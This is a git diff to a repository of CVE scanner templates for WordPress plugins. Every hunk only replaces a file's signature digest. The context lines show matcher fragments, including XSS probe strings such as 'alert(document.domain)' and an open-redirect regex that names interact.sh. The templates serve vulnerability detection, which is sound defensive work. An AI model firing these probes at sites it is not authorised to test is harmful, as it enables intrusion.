No newline at end of file diff --git a/http/cves/2021/CVE-2021-24340.yaml b/http/cves/2021/CVE-2021-24340.yaml index 246f436182..465c664191 100644 --- a/http/cves/2021/CVE-2021-24340.yaml +++ b/http/cves/2021/CVE-2021-24340.yaml @@ -56,4 +56,4 @@ http: - 'status_code_2 == 500' - 'contains(body_2, ">WordPress › Error<") && contains(body_2, ">Your request is not valid.<")' condition: and -# digest: 4a0a004730450220183a03e620c9440c35b2d6073fdd8fd311debe078d409ad5ab0ed7b02f68cd81022100e1fdb85b5428e6dd55de5a162d0347cdc3c6ae247a909958c290934224079b62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205dcef0e1060bf6410f8ccc51b6dc60108a61f504af5607a66e0bfd3cb395781e022018998b666ed53f82c15af12788cdc956d84f2304b15fd173d3be1f38b1a19c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24347.yaml b/http/cves/2021/CVE-2021-24347.yaml index 6b88d58a1d..3a7c65191f 100644 --- a/http/cves/2021/CVE-2021-24347.yaml +++ b/http/cves/2021/CVE-2021-24347.yaml @@ -102,4 +102,4 @@ http: regex: - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)" internal: true -# digest: 4a0a004730450221008132184d590749df7f2b7f6325397ef834ce52492895d770004a69abee5c6028022044920ae885c48f6bcd07ab01726483d065fc52a02202fd0d7e1a69c1ea960f79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085d38a81c8b989c8722beb364cf0c9ec86d6b33d5a29b2bb78551d28536a08db022100eb0b52da08f13e8b8eebf84715feb0dafd2bd2b5fdc3ffdc9a2f2e0f8c713b85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24351.yaml b/http/cves/2021/CVE-2021-24351.yaml index e4fea31b66..fba6741368 100644 --- a/http/cves/2021/CVE-2021-24351.yaml +++ b/http/cves/2021/CVE-2021-24351.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0eaf8ef2a2056147b9485f4d77a8844b65eac6cfb6216d78f3290313d7a3c0d0221008186ee4d441d90db81008c8d1396a431a4347efa93ae3069c01eab7a2b1ee18f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220760ed06432bf30cbd5df6d335162c9e24a7e995f5cae884aeedf3bc4a2dfd1bf02204bc667f8728c778fc9ff0248f2f1d49a60bbb6e943d7116dbbfffe8f515289c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24358.yaml b/http/cves/2021/CVE-2021-24358.yaml index c0a2c61d5f..1c43546ba3 100644 --- a/http/cves/2021/CVE-2021-24358.yaml +++ b/http/cves/2021/CVE-2021-24358.yaml @@ -61,4 +61,4 @@ http: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' internal: true part: header -# digest: 4b0a00483046022100ae75d3fbb605efbbfe6ae9894ef9afa56a51b9d9be1cc299773a592741ef9fcf022100cd029992f746d9d353355c06400c8a7246c94a86df04621081ef99421a51cd76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022011ea822f43460b23dc2579808ea35fa59b082ed0b25017fd169a9638273ad5fb022100dfa29ed479fdfdc49a6e3aaca996b48c9feebacfe86b4f1e3dc126e2dca9bb87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24409.yaml b/http/cves/2021/CVE-2021-24409.yaml index ce95bef48b..01c948f9f1 100644 --- a/http/cves/2021/CVE-2021-24409.yaml +++ b/http/cves/2021/CVE-2021-24409.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Leave A Review?")' - 'contains(body_2, "onanimationend=alert(document.domain)")' condition: and -# digest: 4b0a00483046022100b3a272b73b275993030f6cb84ddacf46958fd51cea8bbee3478f27a93413c9a9022100a4d5c436e634b4c03e12c36e668f37d9d2b56c11fc8527edf562c96413535d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f3b6393f38c382ea7ce0abcf70deef44f182fcd4065ccf2fad781fc835d80a0f0221009809a88c0d01b87cd8335a7a367389737021ea22bbaca6405ab5864aca886c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24435.yaml b/http/cves/2021/CVE-2021-24435.yaml index f224704d68..864a6f9375 100644 --- a/http/cves/2021/CVE-2021-24435.yaml +++ b/http/cves/2021/CVE-2021-24435.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b274a3153b4cde29ead1240a44502cbd6ca417a12104f68f3e81fc354ff0091b022100fa5610d0c8faa4d8504b66848c83c4d689be8c8c917cac6db669e55696f38ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008da5c58728595669ead26be4769eeb1df23297dd017f133391e30af74448ead8022002efbda42f14733af66e2bc5905ff385bc483741dc65089be4c32f87fe01ac82:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index 56fe01869c..ef5943bbeb 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -48,4 +48,4 @@ http: - 'status_code == 200' - 'contains_all(body, "{\"answer_name", "vote\":")' condition: and -# digest: 4a0a0047304502200a19043d7f0d2e1b48cc9b1ae8f2e1b84ac62c18df00ab187a07eb5f98ba5f17022100a48e6060c3f50a27b56f3505e1fa0b6480e1059eda4dcb34d325573dcb4743cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220400950d0fa75587a1672ab2651c5f2359b6e2e562a8e976b14a0c3df14ea75af022100d7140a8c7c94b358b4ce33d56a2ab711aabe08fd44109c2983364d553c4527e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24472.yaml b/http/cves/2021/CVE-2021-24472.yaml index 656326e427..1f57b5be55 100644 --- a/http/cves/2021/CVE-2021-24472.yaml +++ b/http/cves/2021/CVE-2021-24472.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022057be194a5808d00466ff72b9e508174e10f7370ed4dd276f27c062b8d8bc93c4022100a1fa11246e181d2b40cae6ef33377d5fb321750789d7bcc03b09c87b93238a16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb4dede60cbd650ce97bfda0fa91b7f8370e06af577abd3c80b68b8b317218b002201e412b7c8e92f85dcbe03843c685bd8b1901b503ba7e1205e582a81f7966aeef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24495.yaml b/http/cves/2021/CVE-2021-24495.yaml index 4369c05bbc..d65d921b5b 100644 --- a/http/cves/2021/CVE-2021-24495.yaml +++ b/http/cves/2021/CVE-2021-24495.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ad62d472ea3292c9468e6cb2fd946e3f2d275d92502da6f4c39ce040ba978b140220053b172dcde7c61ebe9b7ed6248cd910e232bb089c8707aaaedb6a4bc7f52f8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d42d40aa6ef4a884d3084a8e50e0ee71972fde405b612c457030f7b4fbd83a0202202f0373f878a48a8d60e2ba1fc2b19de2a80adfe86236c8f906bb74d7f01e720d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 1b955e4576..9d4e5d405d 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022053f7aa1da929328cbebc337daa2af812dc588d126578f5cfae4ff8b30fcc5e2702203cec9721837ea172c547273360bc6802dc4fae7d289079e5b59e5f73b956c4f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ffc5f74510cc804d76491c96c3a78a78f0796e6b5950df9ed984c11478e28e0f02206575b9f86340e23cea7171330bc02d9c9865ed226f96c3cba038187054958d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24510.yaml b/http/cves/2021/CVE-2021-24510.yaml index 5eddc3de2b..3d9f11bd99 100644 --- a/http/cves/2021/CVE-2021-24510.yaml +++ b/http/cves/2021/CVE-2021-24510.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058dc77da6c8d24825cb047a3e8c3ebf81009329a2e76774ba7c0057029c91916022100e648680bb6ce6d636b0d7ec9f0cd812776cc4617bf039cc8bac7d00b1ae026d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c5c9ef37f26b09302f5f83979a9d3eb5458a27288f073c0031fa9d5478531155022100cce0f1e12c98cb812f5eadba2970cf1015bc99efa6bcd9ae779ac28418e0be87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24554.yaml b/http/cves/2021/CVE-2021-24554.yaml index aae98ac483..42fafa94e4 100644 --- a/http/cves/2021/CVE-2021-24554.yaml +++ b/http/cves/2021/CVE-2021-24554.yaml @@ -53,4 +53,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "paytm-settings_page_wp_paytm_donation")' condition: and -# digest: 490a0046304402206761ba0bbf5025dd6acebce6ae4c00348e7a0c42d2dabe4f89025ddf1f64856802200b643eb17601d207edb76a789e0506dab04b0d1e4d81a8cef2106f21c6234377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b092e95ed6c8648f9314bf91ab75d65da7ed441e0f53438cb2f29fef0b3fc15d022100ad4c2f079591cb0fd9d7d2c4072ef01d722fee1c9c8e7385c0669f87453932c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24627.yaml b/http/cves/2021/CVE-2021-24627.yaml index 83bf3b7bc4..ccd8d8b750 100644 --- a/http/cves/2021/CVE-2021-24627.yaml +++ b/http/cves/2021/CVE-2021-24627.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bdb4a94865f92c4bfb19042de1f21fae7eebca1adb86abff97ff76e2b8a8343002202507f1d079f5aad3bf0c38a5bed17afdc4c7d599611392cc29897c83b6be1425:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008622e207c9f0ca1114e5c6a581d6366e8af3b5123dcf60107685cf3a2fc5e87d02206a27d7c55a4b02d222f9740a6009fdc11aa7d94d4b5eba63538b574577c9d148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index cd5ba49a13..6479c8b93e 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -52,4 +52,4 @@ http: - 'contains(body_1, "pieregister")' - 'contains(body_3, "Username") && contains(body_3, "email-description")' condition: and -# digest: 4a0a004730450220204302541a5adc4eb84fc50fb71121e7140fda5e325560f2bc6af782c3aca218022100ab9e70ee88a95d91743d26f6f03d095cacd2446df954554ebd5977cd1815c210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b653f536091e0603e57af8a247f5ce9ccc9a68ab71dc37adc2803c35340e3cd902206f6510618f90482cfba44e12b47d8a6e08a7a9223dac740fd1d2186345e92be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24731.yaml b/http/cves/2021/CVE-2021-24731.yaml index c1fb04e22b..b642376aba 100644 --- a/http/cves/2021/CVE-2021-24731.yaml +++ b/http/cves/2021/CVE-2021-24731.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "User credentials are invalid.")' condition: and -# digest: 4b0a00483046022100fce3161626802d300b9a7d01b3d0b39df2f76c16556c4cd0f1f0f331408796bf022100f4a95c3a1fee3e3a75c2105e41b3554e20ce5802440a244a4f7cab3280f3178f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fb5b4e734fba05c09c1c094c94b84b400b14dcba5ef57448829d5b5d3016005a022100d239aadd95068d42bf67a4af289a4912b7ae0c574f6d7a721d993912ffcfd81c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24746.yaml b/http/cves/2021/CVE-2021-24746.yaml index 59d52e2340..97917ec25a 100644 --- a/http/cves/2021/CVE-2021-24746.yaml +++ b/http/cves/2021/CVE-2021-24746.yaml @@ -62,4 +62,4 @@ http: - '"slug":"([_a-z-A-Z0-9]+)",' internal: true part: body -# digest: 4a0a0047304502200993a9a2953aa772460c25d771fb5bc7793c9f97df213694a924f140c82564c2022100ee73b7aa4e200224d68aa207881162ef141bd75466b4b8a9c7973eb4706c3839:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022075953a948bbf07dfe438a4053199d14ef8837ea7498130e197c58060bf0f8a320220385d5b4121d992c9c2ae5d7c7e7e4b0176c57ec274c25d34e1083a6f2b7f910e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index 1ebbaa838e..4ccbb382f4 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd8e2f1ed7e6ac787ddc76d145588e55c3e1af2729f0eb0f6652d1c52284da91022100d61e0a905aa5921060a0e2bc63fdba2790e30fdd1d29ed5d3763b2e491f9dda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066f963610956751aad95f5b686b34695f912af8f37326c25b6fec6f8db31d602022100d6ba059cd38cb02845d4f79da8521497306aca3671c3231f9b17d54f08b1c05f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24838.yaml b/http/cves/2021/CVE-2021-24838.yaml index 3b46901aee..de80448708 100644 --- a/http/cves/2021/CVE-2021-24838.yaml +++ b/http/cves/2021/CVE-2021-24838.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100b49cb02f5e7f2e64f2ca2e050d6d61f31f4b28f27b4d952e4c4f44d672f31fc0022100ca970f8df5900aaa1bb963b0f20c63b05d6bb52089ee35b266d0c44cc1a9ed46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022071227d1361f32f5ff9354a3887ff0536eb287e035f3bee849fbd26799874a89b022100eacf4cb81d3e76c4084196efdece913cdc78100ad1664aef9d5f9b3b5ce486cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24849.yaml b/http/cves/2021/CVE-2021-24849.yaml index eacd0704ad..0909a4c438 100644 --- a/http/cves/2021/CVE-2021-24849.yaml +++ b/http/cves/2021/CVE-2021-24849.yaml @@ -68,4 +68,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "success")' condition: and -# digest: 4b0a00483046022100bbf59a47f71316406d2c275ffe083887a61ca90c2bb565a172cfafec81e8831d022100dd9addbecef7f4747f2d8f4e5e885ce12bf696e155604e3202698bc84fc89420:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100adaf3f6dbade14a8363e77bf12c0cea329147bc2403931be1388051547c74e0f022100a0df347fa16ec48be9b13ad6a97de3bfb8d0d15be7b11f4797ef9cd4278c394a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24862.yaml b/http/cves/2021/CVE-2021-24862.yaml index a25744d26b..f9bb6eb8ce 100644 --- a/http/cves/2021/CVE-2021-24862.yaml +++ b/http/cves/2021/CVE-2021-24862.yaml @@ -54,4 +54,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "rm_user_role_mananger_form")' condition: and -# digest: 4a0a00473045022100e291dd94c5d8a5cf0d02cbfdd5212108c69acd79b92db5c04881b59af89449040220781cf0b9c9e4ff06f64c490aaecc845f875e184b75df4413f58b712af3304d65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e094ec14b2add716b2cc645857d709bbe7216d825cb1b18ce5b7733457860e2c02206859da8890901f7219e49f41586f721cfc4c7b1adfb4768948e8eaf03da4ba26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24875.yaml b/http/cves/2021/CVE-2021-24875.yaml index f6b3138b75..67a28376a0 100644 --- a/http/cves/2021/CVE-2021-24875.yaml +++ b/http/cves/2021/CVE-2021-24875.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "eCommerce Product Catalog")' condition: and -# digest: 4a0a0047304502210090b957beb8440eaf4acf667c971c051694c39e18b33a8a8b31ae16d36d5f56fa0220598145a711dd9feeef1155fb5654ff6abd36cc88b7decadc8e3ea432ed896fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022068762d10731467e795bbe4b8e7b1db7d3be629d6dd145293b02dd9d2ca4f9ffc022079c5abdb01810ddcd4154c5dd96662406962e2b5602f03c7ae765874d4618216:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24891.yaml b/http/cves/2021/CVE-2021-24891.yaml index e17238227a..5fa848cbeb 100644 --- a/http/cves/2021/CVE-2021-24891.yaml +++ b/http/cves/2021/CVE-2021-24891.yaml @@ -70,4 +70,4 @@ http: - type: kval kval: - version -# digest: 490a0046304402205b282380b349f854fb682c0a9e29f9260987ccc282a94ff7317206ba7e3d03db022055093df9a46c6e757eac59c584cb657f373924eae480a7af9c82cf24c168f3a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206ea3f3423d4068dd6ed2c0c60b4b97e5add71418527dc2067a8afeacfba7936502207434fc75eab6c206bf2e9194b2c4891776e633f7d22f0cdb4ed36ffabbf0a748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24915.yaml b/http/cves/2021/CVE-2021-24915.yaml index c7b59060d0..eca520dafd 100644 --- a/http/cves/2021/CVE-2021-24915.yaml +++ b/http/cves/2021/CVE-2021-24915.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220029f49c1e9fa65765eaed8f0325876a75a3da15cad0b9597a1e000f69de3c11f0221008d79ba2600b7e68952c628b0a919d453f58c97dfbc68070006af2ede9825963b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022021e03802b55f2eb84ef9a04bcd3faf25c0e6e1aa7b5f5f1219b885c12debbaff0221009f117cd73568a12faad8e3a4e9a6e0bdb4d0ce5ef3413b62bb2a0f10db515323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24917.yaml b/http/cves/2021/CVE-2021-24917.yaml index f08202d415..d349a0b170 100644 --- a/http/cves/2021/CVE-2021-24917.yaml +++ b/http/cves/2021/CVE-2021-24917.yaml @@ -52,4 +52,4 @@ http: - type: kval kval: - location -# digest: 4b0a00483046022100aa02258a3fe31969b26abef88381abc8502bee1888b8beaa33762c32b70968cf0221008b4c288173be99e17f8cbfc8dec7f1a886966396d1bc254fb80b1ba526800975:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c84c2cd344bcaff4decfba4969af0b615c69b0924f2e8a4c60567b9d62619cb7022100a31f6dfcf3ed63ba7e0837b07f2afdc9a82aef82b837cf35e065afa4ada3aae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24926.yaml b/http/cves/2021/CVE-2021-24926.yaml index 2acffb37c4..e246bf0773 100644 --- a/http/cves/2021/CVE-2021-24926.yaml +++ b/http/cves/2021/CVE-2021-24926.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d0f4d9bfcc048f509d4adc32bc55b484ffb0c20b4119b906aae940c8cd858c120220778eacf2b57cdec131c557397df891c5923101ad74b0501c14fcd71964089258:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c783a4a970c0662a6dd16eae529fb34417646bea28de131de71763a1ef39c0cc02206563dd169b556b99536a82b4faf54ccaf8c788f01fef9f319da3d4b37983af0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24940.yaml b/http/cves/2021/CVE-2021-24940.yaml index 7f6c46512c..baed0b093b 100644 --- a/http/cves/2021/CVE-2021-24940.yaml +++ b/http/cves/2021/CVE-2021-24940.yaml @@ -50,4 +50,4 @@ http: - contains(body_2, 'accesskey=X onclick=alert(1) test=') - contains(body_2, 'woocommerce_persian_translate') condition: and -# digest: 4b0a00483046022100b7047b7f826c9feeea2a1e804ec10dee788c3f73bf6a15b7f203b50f4b63af08022100b8021e9cb1d934188fbe23f2ce21be31736eec16f8f4d29453819a12fab97e43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100826d482d8b237a1f2fa54478c880d7f1f60bf8ffef2b1fc3a2ef61d1d125bcd3022077b886b61bb9b4e8c9f7af2e0ca8a2c49a6fb5758529c7ffaeeb52ff257fc556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index a81863dedf..064d8e7665 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "Please enter the email you registered with")' condition: and -# digest: 4b0a00483046022100b80877af0947d3a8a37e4c34281cf76f8f00154d90974a6dd87bf80d91980837022100eabb89ae18f62fe2508c9fdc28dc7316c524d8dc3a6d1cd28f28d8cc14f0b9f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015bcdf20ae52f30c13798d586e5d521ea0573919ad1d39d94d38ea91d834e80f02210092253fe3526a65605c2e2b2b4ff6d134a3007c85663f8e9536ed0a719e91915e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index f284ecda8b..ebcb0c2ff1 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and -# digest: 4a0a004730450220639f36ec2923e5c1fa51bab912bd571fed2585b6cbe587796844a913eb606c6e022100d5fa2051f016ff2940ca7e37b26ed07563aa7272b2bc5f69a8a4b96dd0f549d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005a0ed6fd4a954f355471debb3135a50f8aa1fc8f46d755cdf7ec6fbad2ebb11022005f3d8ac225181d1a9a4a8514d1810eb4fee21dc685447ccceea3418b5f6a24c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24947.yaml b/http/cves/2021/CVE-2021-24947.yaml index d7e1e07bba..996c90930d 100644 --- a/http/cves/2021/CVE-2021-24947.yaml +++ b/http/cves/2021/CVE-2021-24947.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2e26ade062de1ff1843bcde320f8d5fd95a7bfbbf93876a2c70bb68c00923df022055f0e5e8372c41a0b0115cfc2f7ec8171f565c60e86604524cfce3d01ab71fbf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24970.yaml b/http/cves/2021/CVE-2021-24970.yaml index 47631179bd..b477e9622c 100644 --- a/http/cves/2021/CVE-2021-24970.yaml +++ b/http/cves/2021/CVE-2021-24970.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "Hello world!")' - 'contains(body_2, "Welcome to WordPress")' condition: and -# digest: 4a0a00473045022100b5d1766bc6648351452ccabff49a901fdcee3d82c63473eb3f7da8360ad1a0f802201b2b426c71f82735e56341c6b3a49558a74a3e6d0a936e46a2d1c375a0d2dffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a7b02070d6d419419410aed00e357f3dcfcc93de4f12ce37757d4e21f98ae656022009bb078daf9337fb3b1ba82048e249ea3ffab290def9ad03d42a92ed04a6d43c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-24979.yaml b/http/cves/2021/CVE-2021-24979.yaml index 462f0b3242..d2de46388d 100644 --- a/http/cves/2021/CVE-2021-24979.yaml +++ b/http/cves/2021/CVE-2021-24979.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' condition: and -# digest: 4a0a0047304502204c311ac0221f929a6e40782a29c695f3b9f8f53fdb8540c1a50f006d72c4665f022100bfbd6264919d48a0a9046f8c4b2fc16c812b6b9713d44a254f19dd0c43a97101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d6856e294174b5d9dc89185a9c240281456650c3f4eeb59816c9a51b1ca9517302203a40995842fd40ce5b2cc4200bb0f904d6f6f581d80c0a5616f0f17ab83251be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 83d6467a16..c55cbe0b1a 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -58,4 +58,4 @@ http: - contains(body_3, md5(num)) - contains(body_3, 'PNG') condition: and -# digest: 4a0a00473045022100b5707ad91e6b1dfa5b4a3bc474d4742991a1d184ae0613aa6cb97d286b6dfc10022037152a98a4212c570ce5b27a05074e2caeefd10b0e48b23218d1d6956512453e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e6a744ebfaa614eed30ef3cd33a2ac5c7089be9bbd038ba7defa214e4e5ceea022038599e3aab4aa30059c0ef392fbd7bc905b3871cd35ce7030933fb56e72540d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25008.yaml b/http/cves/2021/CVE-2021-25008.yaml index 352c776b7b..a352ecd5eb 100644 --- a/http/cves/2021/CVE-2021-25008.yaml +++ b/http/cves/2021/CVE-2021-25008.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210080481e6e1ba1c67c11351890a405747b0082be4ba5d44bf5837a927a64705902022023a138df22ac6f0201daaf4656cb1c2ce449367c4251627cbf62327376b74bc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210082b5a190481ec70760a35aecf1b3d8e80483f8b4839e56f54a619e4b7b4e26630220560834cc1d0dc002ef01ad44f8ebae701b1820461e6fd3ab0287f317defec8b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25016.yaml b/http/cves/2021/CVE-2021-25016.yaml index e92757d723..075bcfb9cd 100644 --- a/http/cves/2021/CVE-2021-25016.yaml +++ b/http/cves/2021/CVE-2021-25016.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200562d68182e1f0832f719f7ffcc7031dd943c79e8086641c3bf82c70789eb8f30220539f7c805bba5467372c8534f30dd6565b0ad9886177350366dca637604e7708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5acc9465e15b102954f10f7359ee1bc2f84794775d4ede6b9a7068b41f88775022100a6c201acb8e3d859ec1fd6dbf27d7df311de39ca11129dabdfef9954a4fc6f30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25033.yaml b/http/cves/2021/CVE-2021-25033.yaml index 2908de28bf..4d393cc0b8 100644 --- a/http/cves/2021/CVE-2021-25033.yaml +++ b/http/cves/2021/CVE-2021-25033.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022012084f97047c7ac54d9935c917e356d3e8cc4cf7d1eb64fe16de01ea652b7ca9022100e2abc8461b032fe559fe1bd613aada42533b08c6dc4a843581c08b25e83f2b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 